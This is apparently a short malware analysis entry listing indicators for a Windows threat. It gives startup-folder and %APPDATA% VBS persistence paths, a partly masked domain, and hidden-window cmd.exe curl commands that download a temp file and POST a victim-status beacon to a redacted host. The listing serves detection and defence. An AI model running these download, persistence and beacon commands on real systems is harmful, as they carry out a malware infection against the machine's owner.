Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\cmd.lnk
- %APPDATA%\windows10.vbs
- http://id##t.me/
- DNS ASK id##t.me
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Windows10.vbs"
- '<SYSTEM32>\cmd.exe' /c curl -o %TEMP%\wintask.tmp <redacted>' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c curl -d "content=ebgtkzp user 95.211.190.199 is on standby" -X POST <redacted>' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c curl -o %TEMP%\wintask.tmp <redacted>
- '<SYSTEM32>\cmd.exe' /c curl -d "content=ebgtkzp user 95.211.190.199 is on standby" -X POST <redacted>